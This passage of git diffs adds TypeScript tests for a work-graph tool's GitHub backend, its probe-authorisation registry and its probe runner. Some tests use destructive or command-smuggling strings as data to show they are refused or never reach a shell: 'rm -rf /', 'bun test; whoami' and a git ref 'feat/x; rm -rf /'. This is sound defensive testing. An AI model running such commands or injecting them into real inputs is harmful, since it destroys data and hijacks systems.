+++ b/test/work-graph-github.test.ts
@@ -1,0 +1,289 @@
+import { expect, test } from "bun:test";
+import {
+  WorkGraphError,
+  createGitHubGraphStore,
+  decodeNodeBlock,
+  encodeNodeBlock,
+  parseNodeSpec,
+  type GitHubApiRequest,
+  type GitHubApiTransport,
+  type Probe,
+} from "../src/index";
+
+const REPO = "the-metafactory/soma";
+const PROBE: Probe = { type: "command", run: "bun test", timeoutSec: 600, expectExit: 0 };
+
+interface Recorded extends GitHubApiRequest {
+  key: string;
+}
+
+/** A tracker that never leaves the process: canned responses keyed by `METHOD path`. */
+function fakeTransport(responses: Record<string, unknown>): { transport: GitHubApiTransport; calls: Recorded[] } {
+  const calls: Recorded[] = [];
+  const transport: GitHubApiTransport = async (request) => {
+    const key = `${request.method} ${request.path}`;
+    calls.push({ ...request, key });
+    if (!(key in responses)) throw new Error(`unstubbed request: ${key}`);
+    return responses[key];
+  };
+  return { transport, calls };
+}
+
+function issuePayload(overrides: Record<string, unknown> = {}): Record<string, unknown> {
+  return {
+    number: 497,
+    id: 5043603420,
+    title: "GraphStore seam + GitHub backend",
+    body: "## Task\n\nimplement the seam",
+    state: "open",
+    user: { login: "jcfischer" },
+    assignees: [],
+    html_url: "https://github.com/the-metafactory/soma/issues/497",
+    ...overrides,
+  };
+}
+
+function typedBody(block: Record<string, unknown>, text = "## Task\n\nimplement the seam"): string {
+  return `${text}\n\n<!-- soma:work-graph-node\n${JSON.stringify(block)}\n-->`;
+}
+
+// --- the node block ---------------------------------------------------------
+
+test("the node block round-trips through the issue body and leaves the human text intact", () => {
+  const spec = parseNodeSpec({
+    title: "seam",
+    autonomy: "auto",
+    kind: "task",
+    checkpointId: "cp-497",
+    probes: [PROBE],
+    body: "## Task\n\nimplement the seam",
+  });
+  const body = `${spec.body ?? ""}\n\n${encodeNodeBlock(spec)}`;
+  const decoded = decodeNodeBlock(body);
+
+  expect(decoded.text).toBe("## Task\n\nimplement the seam");
+  expect(parseNodeSpec({ ...(JSON.parse(decoded.raw ?? "{}") as object), title: "seam" })).toEqual(
+    parseNodeSpec({ title: "seam", autonomy: "auto", kind: "task", checkpointId: "cp-497", probes: [PROBE] }),
+  );
+});
+
+test("an issue with no block decodes to plain text", () => {
+  expect(decodeNodeBlock("just a question")).toEqual({ text: "just a question" });
+});
+
+// --- readNode ---------------------------------------------------------------
+
+test("readNode types the node from the block and reports blockers with their status", async () => {
+  const { transport } = fakeTransport({
+    [`GET repos/${REPO}/issues/497`]: issuePayload({
+      body: typedBody({ autonomy: "auto", kind: "Task", checkpointId: "cp-497", probes: [PROBE] }),
+      assignees: [{ login: "jcfischer" }],
+    }),
+    [`GET repos/${REPO}/issues/497/dependencies/blocked_by`]: [
+      issuePayload({ number: 495, id: 1, state: "closed" }),
+      issuePayload({ number: 502, id: 2, state: "open" }),
+    ],
+  });
+
+  const state = await createGitHubGraphStore({ repo: REPO, transport }).readNode({ id: "497" });
+
+  expect(state.typed).toBe(true);
+  expect(state.node.autonomy).toBe("auto");
+  expect(state.node.kind).toBe("task");
+  expect(state.node.probes).toEqual([PROBE]);
+  expect(state.node.id).toBe("497");
+  expect(state.author).toBe("jcfischer");
+  expect(state.assignees).toEqual(["jcfischer"]);
+  expect(state.body).toBe("## Task\n\nimplement the seam");
+  expect(state.blockedBy).toEqual([
+    { id: "495", status: "closed" },
+    { id: "502", status: "open" },
+  ]);
+});
+
+test("a hand-authored issue reads as the most-gated class, never as auto", async () => {
+  const { transport } = fakeTransport({
+    [`GET repos/${REPO}/issues/497`]: issuePayload(),
+    [`GET repos/${REPO}/issues/497/dependencies/blocked_by`]: [],
+  });
+
+  const state = await createGitHubGraphStore({ repo: REPO, transport }).readNode({ id: "497" });
+
+  expect(state.typed).toBe(false);
+  expect(state.node.autonomy).toBe("approve");
+  expect(state.node.probes).toBeUndefined();
+  expect(state.node.checkpointId).toBeUndefined(); // and therefore cannot close
+  expect(state.parseError).toBeUndefined();
+});
+
+test("a corrupt node block downgrades visibly — fail-safe class plus the reason", async () => {
+  const { transport } = fakeTransport({
+    [`GET repos/${REPO}/issues/497`]: issuePayload({
+      body: typedBody({ autonomy: "auto", checkpointId: "cp-497" }), // auto with no probes
+    }),
+    [`GET repos/${REPO}/issues/497/dependencies/blocked_by`]: [],
+  });
+
+  const state = await createGitHubGraphStore({ repo: REPO, transport }).readNode({ id: "497" });
+
+  expect(state.typed).toBe(false);
+  expect(state.node.autonomy).toBe("approve");
+  expect(state.parseError).toContain("probe");
+});
+
+// --- writes -----------------------------------------------------------------
+
+test("createNode writes the block into the body and attaches to the parent by database id", async () => {
+  const { transport, calls } = fakeTransport({
+    [`POST repos/${REPO}/issues`]: issuePayload({ number: 513, id: 999 }),
+    [`POST repos/${REPO}/issues/495/sub_issues`]: {},
+  });
+
+  const ref = await createGitHubGraphStore({ repo: REPO, transport }).createNode(
+    parseNodeSpec({
+      title: "verbs",
+      autonomy: "auto",
+      probes: [PROBE],
+      body: "## Task\n\nbuild the verbs",
+      parent: { id: "495" },
+    }),
+  );
+
+  expect(ref).toEqual({ id: "513" });
+  const created = calls[0]?.body as { title: string; body: string };
+  expect(created.title).toBe("verbs");
+  expect(created.body).toContain("## Task\n\nbuild the verbs");
+  expect(created.body).toContain("soma:work-graph-node");
+  // The sub-issue endpoint takes the database id, not the issue number.
+  expect(calls[1]?.body).toEqual({ sub_issue_id: 999 });
+});
+
+test("addBlockingEdge resolves the blocker's database id and writes the native dependency", async () => {
+  const { transport, calls } = fakeTransport({
+    [`GET repos/${REPO}/issues/497`]: issuePayload({ number: 497, id: 5043603420 }),
+    [`POST repos/${REPO}/issues/498/dependencies/blocked_by`]: {},
+  });
+
+  await createGitHubGraphStore({ repo: REPO, transport }).addBlockingEdge({ id: "497" }, { id: "498" });
+
+  expect(calls[1]?.key).toBe(`POST repos/${REPO}/issues/498/dependencies/blocked_by`);
+  expect(calls[1]?.body).toEqual({ issue_id: 5043603420 });
+});
+
+test("listCandidateFrontier reads native sub-issues and drops the closed ones", async () => {
+  const { transport } = fakeTransport({
+    [`GET repos/${REPO}/issues/495/sub_issues`]: [
+      issuePayload({ number: 497, state: "open" }),
+      issuePayload({ number: 502, state: "closed" }),
+      issuePayload({ number: 511, state: "open" }),
+    ],
+  });
+
+  const candidates = await createGitHubGraphStore({ repo: REPO, transport }).listCandidateFrontier({ id: "495" });
+
+  expect(candidates).toEqual([{ id: "497" }, { id: "511" }]);
+});
+
+// --- claim ------------------------------------------------------------------
+
+test("an uncontested claim is held after the re-read", async () => {
+  const { transport, calls } = fakeTransport({
+    [`GET repos/${REPO}/issues/497`]: issuePayload({ assignees: [{ login: "ivy-agent" }] }),
+    [`POST repos/${REPO}/issues/497/assignees`]: {},
+  });
+
+  const result = await createGitHubGraphStore({ repo: REPO, transport }).claim({ id: "497" }, "ivy-agent");
+
+  expect(result).toEqual({ held: true, identity: "ivy-agent", holder: "ivy-agent", assignees: ["ivy-agent"] });
+  expect(calls.map((call) => call.key)).toEqual([
+    `GET repos/${REPO}/issues/497`,
+    `POST repos/${REPO}/issues/497/assignees`,
+    `GET repos/${REPO}/issues/497`,
+  ]);
+});
+
+test("a losing racer removes itself, so the assignee set converges on one holder", async () => {
+  const { transport, calls } = fakeTransport({
+    // Re-read shows the race: "Ada" sorts first by code point.
+    [`GET repos/${REPO}/issues/497`]: issuePayload({ assignees: [{ login: "ivy-agent" }, { login: "Ada" }] }),
+    [`POST repos/${REPO}/issues/497/assignees`]: {},
+    [`DELETE repos/${REPO}/issues/497/assignees`]: {},
+  });
+
+  const result = await createGitHubGraphStore({ repo: REPO, transport }).claim({ id: "497" }, "ivy-agent");
+
+  expect(result.held).toBe(false);
+  expect(result.holder).toBe("Ada");
+  expect(result.assignees).toEqual(["Ada"]);
+  expect(calls.at(-1)?.key).toBe(`DELETE repos/${REPO}/issues/497/assignees`);
+  expect(calls.at(-1)?.body).toEqual({ assignees: ["ivy-agent"] });
+});
+
+test("claiming a closed issue is refused by the backend too", async () => {
+  const { transport, calls } = fakeTransport({
+    [`GET repos/${REPO}/issues/497`]: issuePayload({ state: "closed" }),
+  });
+
+  let thrown: unknown;
+  try {
+    await createGitHubGraphStore({ repo: REPO, transport }).claim({ id: "497" }, "ivy-agent");
+  } catch (error) {
+    thrown = error;
+  }
+  expect(thrown).toBeInstanceOf(WorkGraphError);
+  expect((thrown as WorkGraphError).code).toBe("node-closed");
+  expect(calls).toHaveLength(1);
+});
+
+// --- comments, reactions, close --------------------------------------------
+
+test("reaction authors come from the API author field, never from body text", async () => {
+  const { transport } = fakeTransport({
+    [`GET repos/${REPO}/issues/comments/42/reactions`]: [
+      { id: 7, content: "+1", user: { login: "jcfischer" }, created_at: "2026-08-04T10:00:00Z" },
+    ],
+  });
+
+  const reactions = await createGitHubGraphStore({ repo: REPO, transport }).readCommentReactions({
+    id: "42",
+    nodeId: "497",
+  });
+
+  expect(reactions).toEqual([
+    { id: "7", content: "+1", author: "jcfischer", createdAt: "2026-08-04T10:00:00Z" },
+  ]);
+});
+
+test("close posts the receipt before flipping the state", async () => {
+  const { transport, calls } = fakeTransport({
+    [`POST repos/${REPO}/issues/497/comments`]: { id: 42, user: { login: "ivy-agent" } },
+    [`PATCH repos/${REPO}/issues/497`]: issuePayload({ state: "closed" }),
+  });
+
+  await createGitHubGraphStore({ repo: REPO, transport }).close(
+    { id: "497" },
+    {
+      checkpointId: "cp-497",
+      closedBy: "ivy-agent",
+      at: "2026-08-04T10:00:00.000Z",
+      evidence: [{ kind: "probed", summary: "bun test exit 0", pointer: "https://example.test/run/1" }],
+      probeResults: [{ probe: PROBE, state: "probed", outcome: "pass", observed: "exit 0", at: "2026-08-04T09:59:00.000Z" }],
+      attestation: "unverified",
+    },
+  );
+
+  expect(calls.map((call) => call.key)).toEqual([
+    `POST repos/${REPO}/issues/497/comments`,
+    `PATCH repos/${REPO}/issues/497`,
+  ]);
+  expect((calls[0]?.body as { body: string }).body).toContain("cp-497");
+  expect((calls[1]?.body as { state: string }).state).toBe("closed");
+});
+
+// --- construction -----------------------------------------------------------
+
+test("a graph is bound to one owner/name repo", () => {
+  const { transport } = fakeTransport({});
+  expect(() => createGitHubGraphStore({ repo: "soma", transport })).toThrow(WorkGraphError);
+  expect(() => createGitHubGraphStore({ repo: REPO, transport })).not.toThrow();
+});

--- a/test/work-graph-github.test.ts
+++ b/test/work-graph-github.test.ts
@@ -23,7 +23,13 @@ function fakeTransport(responses: Record<string, unknown>): { transport: GitHubA
   const transport: GitHubApiTransport = async (request) => {
     const key = `${request.method} ${request.path}`;
     calls.push({ ...request, key });
-    if (!(key in responses)) throw new Error(`unstubbed request: ${key}`);
+    if (!(key in responses)) {
+      // `readNode` always asks GraphQL for the parent edge (REST omits it), so
+      // default to "no parent" and let a test stub it only when that edge is
+      // what it is testing.
+      if (key === "POST graphql") return { data: { repository: { issue: { parent: null } } } };
+      throw new Error(`unstubbed request: ${key}`);
+    }
     return responses[key];
   };
   return { transport, calls };
@@ -99,6 +105,31 @@ test("readNode types the node from the block and reports blockers with their sta
     { id: "495", status: "closed" },
     { id: "502", status: "open" },
   ]);
+});
+
+test("the parent edge comes from GraphQL, because the REST issue payload has no parent key", async () => {
+  const { transport, calls } = fakeTransport({
+    [`GET repos/${REPO}/issues/497`]: issuePayload(),
+    [`GET repos/${REPO}/issues/497/dependencies/blocked_by`]: [],
+    "POST graphql": { data: { repository: { issue: { parent: { number: 495 } } } } },
+  });
+
+  const state = await createGitHubGraphStore({ repo: REPO, transport }).readNode({ id: "497" });
+
+  expect(state.parent).toEqual({ id: "495" });
+  const graphql = calls.find((call) => call.key === "POST graphql");
+  expect(graphql?.body?.variables).toEqual({ owner: "the-metafactory", name: "soma", number: 497 });
+});
+
+test("an unreadable parent is undefined, never an assumed root — §3.2 conjunct 4 downgrades on it", async () => {
+  const { transport } = fakeTransport({
+    [`GET repos/${REPO}/issues/497`]: issuePayload(),
+    [`GET repos/${REPO}/issues/497/dependencies/blocked_by`]: [],
+    "POST graphql": { errors: [{ message: "field unavailable" }] },
+  });
+
+  const state = await createGitHubGraphStore({ repo: REPO, transport }).readNode({ id: "497" });
+  expect(state.parent).toBeUndefined();
 });
 
 test("a hand-authored issue reads as the most-gated class, never as auto", async () => {

--- a/test/work-graph-probe-registry.test.ts
+++ b/test/work-graph-probe-registry.test.ts
@@ -1,0 +1,238 @@
+import { expect, test } from "bun:test";
+import { mkdtemp, mkdir, writeFile } from "node:fs/promises";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+import { parsePolicyArgs, runPolicyCli } from "../src/cli/policy";
+import {
+  authorizeProbe,
+  loadProbeRegistry,
+  parseProbeRegistry,
+  probeRegistryPath,
+  PROBE_REGISTRY_RELATIVE_PATH,
+  type ProbeRegistry,
+} from "../src/index";
+
+const REPO = "the-metafactory/soma";
+const PATH = "/home/.soma/policy/probe-registry.json";
+
+function parse(raw: string, repo = REPO, homeDir?: string): ProbeRegistry {
+  return parseProbeRegistry({ repo, path: PATH, raw, ...(homeDir === undefined ? {} : { homeDir }) });
+}
+
+function invalidReason(registry: ProbeRegistry): string {
+  if (registry.status !== "invalid") throw new Error(`expected an invalid registry, got ${registry.status}`);
+  return registry.reason;
+}
+
+function loaded(registry: ProbeRegistry): Extract<ProbeRegistry, { status: "loaded" }> {
+  if (registry.status !== "loaded") throw new Error(`expected a loaded registry, got ${registry.status}`);
+  return registry;
+}
+
+const GOOD = JSON.stringify({
+  version: 1,
+  repos: {
+    "the-metafactory/soma": {
+      commands: [{ run: "bun test", cwd: "/repo" }],
+      urlHosts: ["status.example.test"],
+    },
+  },
+});
+
+// ---------------------------------------------------------------------------
+// Parsing
+// ---------------------------------------------------------------------------
+
+test("a well-formed document yields the declarations for the requested repo only", () => {
+  const raw = JSON.stringify({
+    version: 1,
+    repos: {
+      "the-metafactory/soma": { commands: [{ run: "bun test", cwd: "/repo" }], urlHosts: ["a.example.test"] },
+      "someone/else": { commands: [{ run: "rm -rf /", cwd: "/elsewhere" }], urlHosts: ["b.example.test"] },
+    },
+  });
+
+  const mine = loaded(parse(raw));
+  expect(mine.commands).toEqual([{ run: "bun test", cwd: "/repo" }]);
+  expect(mine.urlHosts).toEqual(["a.example.test"]);
+
+  const theirs = loaded(parse(raw, "someone/else"));
+  expect(theirs.commands).toEqual([{ run: "rm -rf /", cwd: "/elsewhere" }]);
+});
+
+test("repository keys match case-insensitively, and a duplicate key is refused rather than resolved", () => {
+  const mixedCase = loaded(parse(JSON.stringify({ version: 1, repos: { "The-MetaFactory/Soma": { commands: [{ run: "bun test", cwd: "/repo" }] } } })));
+  expect(mixedCase.commands).toHaveLength(1);
+
+  const duplicate = parse(
+    JSON.stringify({
+      version: 1,
+      repos: { "the-metafactory/soma": { commands: [] }, "The-Metafactory/Soma": { commands: [{ run: "x", cwd: "/repo" }] } },
+    }),
+  );
+  expect(invalidReason(duplicate)).toContain("more than once");
+});
+
+test("a repo with no entry loads empty rather than erroring — same refusal, different message", () => {
+  const registry = loaded(parse(GOOD, "someone/unknown"));
+  expect(registry.commands).toEqual([]);
+  expect(registry.urlHosts).toEqual([]);
+
+  const refusal = authorizeProbe({ type: "command", run: "bun test", timeoutSec: 60, expectExit: 0 }, "/repo", registry);
+  expect(refusal.allowed).toBe(false);
+  if (!refusal.allowed) expect(refusal.reason).toContain("0 command(s) declared");
+});
+
+test("the whole document is validated, not just the entry being asked for", () => {
+  // A typo under someone else's key must not pass unnoticed: in an
+  // authorisation list a silently-ignored key is what makes an adopter believe
+  // something is declared when it is not.
+  const registry = parse(
+    JSON.stringify({
+      version: 1,
+      repos: {
+        "the-metafactory/soma": { commands: [{ run: "bun test", cwd: "/repo" }] },
+        "someone/else": { comands: [] },
+      },
+    }),
+  );
+  expect(invalidReason(registry)).toContain("comands");
+});
+
+test("malformed documents refuse with a reason that names the fix", () => {
+  expect(invalidReason(parse("{"))).toContain("not valid JSON");
+  expect(invalidReason(parse("[]"))).toContain("must be a JSON object");
+  expect(invalidReason(parse(JSON.stringify({ version: 2, repos: {} })))).toContain(`must declare "version": 1`);
+  expect(invalidReason(parse(JSON.stringify({ repos: {} })))).toContain(`must declare "version": 1`);
+  expect(invalidReason(parse(JSON.stringify({ version: 1, repos: [] })))).toContain(`"repos" must be an object`);
+  expect(invalidReason(parse(JSON.stringify({ version: 1, repos: {}, allow: true })))).toContain("unknown top-level key");
+  expect(invalidReason(parse(JSON.stringify({ version: 1, repos: { "a/b": { commands: {} } } })))).toContain("must be an array");
+  expect(invalidReason(parse(JSON.stringify({ version: 1, repos: { "a/b": { commands: [{ run: "x" }] } } })))).toContain("cwd must be a non-empty string");
+  expect(invalidReason(parse(JSON.stringify({ version: 1, repos: { "a/b": { commands: [{ cwd: "/x" }] } } })))).toContain("run must be a non-empty string");
+  expect(invalidReason(parse(JSON.stringify({ version: 1, repos: { "a/b": { commands: [{ run: "x", cwd: "/x", timeout: 5 }] } } })))).toContain("unknown key");
+});
+
+test("a relative declared cwd is refused — it would authorise a different directory per invocation", () => {
+  const registry = parse(JSON.stringify({ version: 1, repos: { "a/b": { commands: [{ run: "bun test", cwd: "./repo" }] } } }));
+  expect(invalidReason(registry)).toContain("must be an absolute path");
+});
+
+test("a declared cwd may use ~, and normalises to an absolute path", () => {
+  const registry = loaded(
+    parse(JSON.stringify({ version: 1, repos: { [REPO]: { commands: [{ run: "bun test", cwd: "~/work/soma/" }] } } }), REPO, "/home/jc"),
+  );
+  expect(registry.commands).toEqual([{ run: "bun test", cwd: "/home/jc/work/soma" }]);
+});
+
+test("declared hosts are bare hostnames — no scheme, port, path, or wildcard", () => {
+  const host = (value: unknown): ProbeRegistry =>
+    parse(JSON.stringify({ version: 1, repos: { "a/b": { urlHosts: [value] } } }));
+
+  expect(invalidReason(host("https://example.test"))).toContain("bare hostname");
+  expect(invalidReason(host("example.test:8080"))).toContain("bare hostname");
+  expect(invalidReason(host("example.test/health"))).toContain("bare hostname");
+  expect(invalidReason(host("user@example.test"))).toContain("bare hostname");
+  expect(invalidReason(host("*.example.test"))).toContain(`may not contain "*"`);
+  expect(invalidReason(host(""))).toContain("non-empty string");
+
+  const ok = loaded(parse(JSON.stringify({ version: 1, repos: { [REPO]: { urlHosts: ["Example.Test", "[::1]"] } } })));
+  expect(ok.urlHosts).toEqual(["example.test", "[::1]"]);
+});
+
+// ---------------------------------------------------------------------------
+// Authorisation
+// ---------------------------------------------------------------------------
+
+test("the three argv probe types stay ungated, with or without a registry", () => {
+  const absent: ProbeRegistry = { status: "absent", repo: REPO, path: PATH };
+  expect(authorizeProbe({ type: "git-ref-exists", ref: "main" }, "/repo", absent).allowed).toBe(true);
+  expect(authorizeProbe({ type: "git-merged-into", ref: "x", into: "main" }, "/repo", undefined).allowed).toBe(true);
+  expect(authorizeProbe({ type: "artifact-exists", path: "README.md" }, "/repo", undefined).allowed).toBe(true);
+});
+
+test("the command match is exact on run — an edited probe breaks it (DD-7 exact bytes)", () => {
+  const registry = loaded(parse(GOOD));
+  expect(authorizeProbe({ type: "command", run: "bun test", timeoutSec: 60, expectExit: 0 }, "/repo", registry).allowed).toBe(true);
+  expect(authorizeProbe({ type: "command", run: "bun test ", timeoutSec: 60, expectExit: 0 }, "/repo", registry).allowed).toBe(false);
+  expect(authorizeProbe({ type: "command", run: "bun  test", timeoutSec: 60, expectExit: 0 }, "/repo", registry).allowed).toBe(false);
+  expect(authorizeProbe({ type: "command", run: "bun test; whoami", timeoutSec: 60, expectExit: 0 }, "/repo", registry).allowed).toBe(false);
+});
+
+test("an unparsable url target is refused before anything is fetched", () => {
+  const registry = loaded(parse(GOOD));
+  const result = authorizeProbe({ type: "url", target: "not a url", expectStatus: 200 }, "/repo", registry);
+  expect(result.allowed).toBe(false);
+  if (!result.allowed) expect(result.reason).toContain("not a parsable URL");
+});
+
+test("a refusal message bounds what a node author can echo into the receipt", () => {
+  const registry = loaded(parse(GOOD));
+  const result = authorizeProbe(
+    { type: "command", run: "x".repeat(50_000), timeoutSec: 60, expectExit: 0 },
+    "/repo",
+    registry,
+  );
+  expect(result.allowed).toBe(false);
+  if (!result.allowed) {
+    expect(result.reason.length).toBeLessThan(2_000);
+    expect(result.reason).toContain("truncated");
+  }
+});
+
+// ---------------------------------------------------------------------------
+// Loading from soma-home
+// ---------------------------------------------------------------------------
+
+test("the registry is read from soma-home, never the repo it guards", async () => {
+  const home = await mkdtemp(join(tmpdir(), "soma-probe-registry-"));
+  const somaHome = join(home, ".soma");
+  await mkdir(join(somaHome, "policy"), { recursive: true });
+
+  expect(probeRegistryPath({ homeDir: home })).toBe(join(somaHome, PROBE_REGISTRY_RELATIVE_PATH));
+
+  const absent = await loadProbeRegistry({ repo: REPO, homeDir: home });
+  expect(absent.status).toBe("absent");
+
+  await writeFile(join(somaHome, PROBE_REGISTRY_RELATIVE_PATH), GOOD, "utf8");
+  const present = await loadProbeRegistry({ repo: REPO, homeDir: home });
+  expect(loaded(present).commands).toEqual([{ run: "bun test", cwd: "/repo" }]);
+
+  await writeFile(join(somaHome, PROBE_REGISTRY_RELATIVE_PATH), "{ broken", "utf8");
+  expect(invalidReason(await loadProbeRegistry({ repo: REPO, homeDir: home }))).toContain("not valid JSON");
+});
+
+test("`soma policy probes` shows the adopter what is declared and where to edit it", async () => {
+  const home = await mkdtemp(join(tmpdir(), "soma-probe-registry-cli-"));
+  const document = join(home, ".soma", PROBE_REGISTRY_RELATIVE_PATH);
+  await mkdir(join(home, ".soma", "policy"), { recursive: true });
+
+  const show = async (): Promise<string> =>
+    await runPolicyCli(parsePolicyArgs(["policy", "probes", "--repo", REPO, "--home-dir", home]));
+
+  const absent = await show();
+  expect(absent).toContain("status: absent");
+  expect(absent).toContain(document);
+  expect(absent).toContain("ungated");
+
+  await writeFile(document, GOOD, "utf8");
+  const listed = await show();
+  expect(listed).toContain("status: loaded");
+  expect(listed).toContain("`bun test` in /repo");
+  expect(listed).toContain("status.example.test");
+  // No verb widens the list: adding an entry is a loosening mutation (§4).
+  expect(listed).toContain("edit the document yourself");
+
+  await writeFile(document, "{ broken", "utf8");
+  expect(await show()).toContain("status: invalid");
+});
+
+test("a read that throws becomes an invalid registry, never an exception", async () => {
+  const registry = await loadProbeRegistry({
+    repo: REPO,
+    homeDir: "/home/jc",
+    readFile: async () => {
+      throw new Error("EACCES");
+    },
+  });
+  expect(invalidReason(registry)).toContain("EACCES");
+});

--- a/test/work-graph-probes.test.ts
+++ b/test/work-graph-probes.test.ts
@@ -1,0 +1,207 @@
+import { expect, test } from "bun:test";
+import {
+  allProbesPassed,
+  boundObserved,
+  runProbe,
+  runProbes,
+  type CommandOutcome,
+  type CommandRequest,
+  type Probe,
+  type ProbeRunnerOptions,
+} from "../src/index";
+
+const AT = new Date("2026-08-04T09:00:00.000Z");
+
+function deps(
+  overrides: {
+    command?: (request: CommandRequest) => CommandOutcome;
+    fetchStatus?: (target: string) => Promise<number>;
+    pathExists?: (path: string) => boolean;
+  } = {},
+): ProbeRunnerOptions {
+  const calls: CommandRequest[] = [];
+  return {
+    cwd: "/repo",
+    deps: {
+      runCommand: async (request) => {
+        calls.push(request);
+        return overrides.command?.(request) ?? { exitCode: 0, stdout: "", stderr: "", timedOut: false };
+      },
+      ...(overrides.fetchStatus === undefined ? {} : { fetchStatus: overrides.fetchStatus }),
+      ...(overrides.pathExists === undefined ? {} : { pathExists: overrides.pathExists }),
+      now: () => AT,
+    },
+  };
+}
+
+function requireProbed(result: Awaited<ReturnType<typeof runProbe>>): {
+  outcome: "pass" | "fail";
+  observed: string;
+  at: string;
+} {
+  if (result.state !== "probed") throw new Error("runner returned a specified result — it must always run the probe");
+  return { outcome: result.outcome, observed: result.observed, at: result.at };
+}
+
+test("a command probe passes only on the declared exit code, and records exit + output tail", async () => {
+  const probe: Probe = { type: "command", run: "bun test", timeoutSec: 600, expectExit: 0 };
+
+  const pass = requireProbed(
+    await runProbe(probe, deps({ command: () => ({ exitCode: 0, stdout: "640 pass", stderr: "", timedOut: false }) })),
+  );
+  expect(pass.outcome).toBe("pass");
+  expect(pass.observed).toContain("exit 0");
+  expect(pass.observed).toContain("640 pass");
+  expect(pass.at).toBe(AT.toISOString());
+
+  const fail = requireProbed(
+    await runProbe(probe, deps({ command: () => ({ exitCode: 1, stdout: "", stderr: "2 fail", timedOut: false }) })),
+  );
+  expect(fail.outcome).toBe("fail");
+  expect(fail.observed).toContain("expected exit 0");
+});
+
+test("timeout expiry is probe failure, never a pass and never a hang (§2.2)", async () => {
+  const probe: Probe = { type: "command", run: "sleep 999", timeoutSec: 5, expectExit: 0 };
+  const result = requireProbed(
+    await runProbe(probe, deps({ command: () => ({ exitCode: null, stdout: "", stderr: "", timedOut: true }) })),
+  );
+
+  expect(result.outcome).toBe("fail");
+  expect(result.observed).toContain("timed out after 5s");
+});
+
+test("a runner error is a failed probe, not an exception — fail-closed", async () => {
+  const probe: Probe = { type: "url", target: "https://example.test/health", expectStatus: 200 };
+  const result = requireProbed(
+    await runProbe(probe, {
+      deps: {
+        fetchStatus: async () => {
+          throw new Error("ECONNREFUSED");
+        },
+        now: () => AT,
+      },
+    }),
+  );
+
+  expect(result.outcome).toBe("fail");
+  expect(result.observed).toContain("ECONNREFUSED");
+});
+
+test("a url probe compares the status it was told to expect", async () => {
+  const probe: Probe = { type: "url", target: "https://example.test/", expectStatus: 204 };
+
+  expect(requireProbed(await runProbe(probe, deps({ fetchStatus: async () => 204 }))).outcome).toBe("pass");
+  const wrong = requireProbed(await runProbe(probe, deps({ fetchStatus: async () => 500 })));
+  expect(wrong.outcome).toBe("fail");
+  expect(wrong.observed).toContain("expected 204");
+});
+
+test("git probes run as argv, never through a shell — a ref name cannot inject", async () => {
+  const seen: CommandRequest[] = [];
+  const probe: Probe = { type: "git-ref-exists", ref: "feat/x; rm -rf /" };
+
+  await runProbe(probe, {
+    cwd: "/repo",
+    deps: {
+      runCommand: async (request) => {
+        seen.push(request);
+        return { exitCode: 0, stdout: "abc1234\n", stderr: "", timedOut: false };
+      },
+      now: () => AT,
+    },
+  });
+
+  expect(seen).toHaveLength(1);
+  expect(seen[0].shell).toBeUndefined();
+  expect(seen[0].argv).toEqual(["git", "-C", "/repo", "rev-parse", "--verify", "--quiet", "feat/x; rm -rf /^{commit}"]);
+});
+
+test("git-ref-exists reports the resolved sha when it passes", async () => {
+  const result = requireProbed(
+    await runProbe(
+      { type: "git-ref-exists", ref: "main" },
+      deps({ command: () => ({ exitCode: 0, stdout: "deadbeef\n", stderr: "", timedOut: false }) }),
+    ),
+  );
+  expect(result.outcome).toBe("pass");
+  expect(result.observed).toContain("deadbeef");
+});
+
+test("git-merged-into fails when the ref is not an ancestor", async () => {
+  const result = requireProbed(
+    await runProbe(
+      { type: "git-merged-into", ref: "feat/work-graph-primitive", into: "main" },
+      deps({
+        command: (request) =>
+          request.argv?.includes("merge-base") === true
+            ? { exitCode: 1, stdout: "", stderr: "", timedOut: false }
+            : { exitCode: 0, stdout: "abc1234\n", stderr: "", timedOut: false },
+      }),
+    ),
+  );
+
+  expect(result.outcome).toBe("fail");
+  expect(result.observed).toContain("is not an ancestor of main");
+});
+
+test("artifact-exists checks the filesystem without atRef and the tree with it", async () => {
+  const onDisk = requireProbed(
+    await runProbe({ type: "artifact-exists", path: "src/work-graph.ts" }, deps({ pathExists: () => true })),
+  );
+  expect(onDisk.outcome).toBe("pass");
+
+  const seen: CommandRequest[] = [];
+  const atRef = requireProbed(
+    await runProbe(
+      { type: "artifact-exists", path: "src/work-graph.ts", atRef: "main" },
+      {
+        cwd: "/repo",
+        deps: {
+          runCommand: async (request) => {
+            seen.push(request);
+            return { exitCode: 1, stdout: "", stderr: "", timedOut: false };
+          },
+          now: () => AT,
+        },
+      },
+    ),
+  );
+  expect(seen[0].argv).toEqual(["git", "-C", "/repo", "cat-file", "-e", "main:src/work-graph.ts"]);
+  expect(atRef.outcome).toBe("fail");
+});
+
+test("runProbes runs every probe in order and allProbesPassed needs all of them", async () => {
+  const order: string[] = [];
+  const probes: Probe[] = [
+    { type: "command", run: "first", timeoutSec: 10, expectExit: 0 },
+    { type: "command", run: "second", timeoutSec: 10, expectExit: 0 },
+  ];
+
+  const results = await runProbes(
+    probes,
+    deps({
+      command: (request) => {
+        order.push(request.shell ?? "");
+        return { exitCode: request.shell === "second" ? 3 : 0, stdout: "", stderr: "", timedOut: false };
+      },
+    }),
+  );
+
+  expect(order).toEqual(["first", "second"]);
+  expect(results).toHaveLength(2);
+  expect(allProbesPassed(results)).toBe(false);
+  expect(allProbesPassed(results.slice(0, 1))).toBe(true);
+});
+
+test("a specified-but-unrun probe never counts as passed", () => {
+  const probe: Probe = { type: "command", run: "bun test", timeoutSec: 10, expectExit: 0 };
+  expect(allProbesPassed([{ probe, state: "specified" }])).toBe(false);
+});
+
+test("observed output keeps the tail, where the failure reason lives", () => {
+  const long = `${"x".repeat(5_000)}THE-REASON`;
+  const bounded = boundObserved(long, 20);
+  expect(bounded).toContain("THE-REASON");
+  expect(bounded.length).toBeLessThan(30);
+});

--- a/test/work-graph-probes.test.ts
+++ b/test/work-graph-probes.test.ts
@@ -2,26 +2,52 @@ import { expect, test } from "bun:test";
 import {
   allProbesPassed,
   boundObserved,
+  isProbeRefusal,
   runProbe,
   runProbes,
   type CommandOutcome,
   type CommandRequest,
+  type DeclaredCommand,
   type Probe,
+  type ProbeRegistry,
   type ProbeRunnerOptions,
 } from "../src/index";
 
 const AT = new Date("2026-08-04T09:00:00.000Z");
+const REPO = "the-metafactory/soma";
+const REGISTRY_PATH = "/home/.soma/policy/probe-registry.json";
+
+/**
+ * Every `command` and `url` probe in this file runs under a registry that
+ * declares it — the gate is deny-by-default (DD-16 Amendment A), so a runner
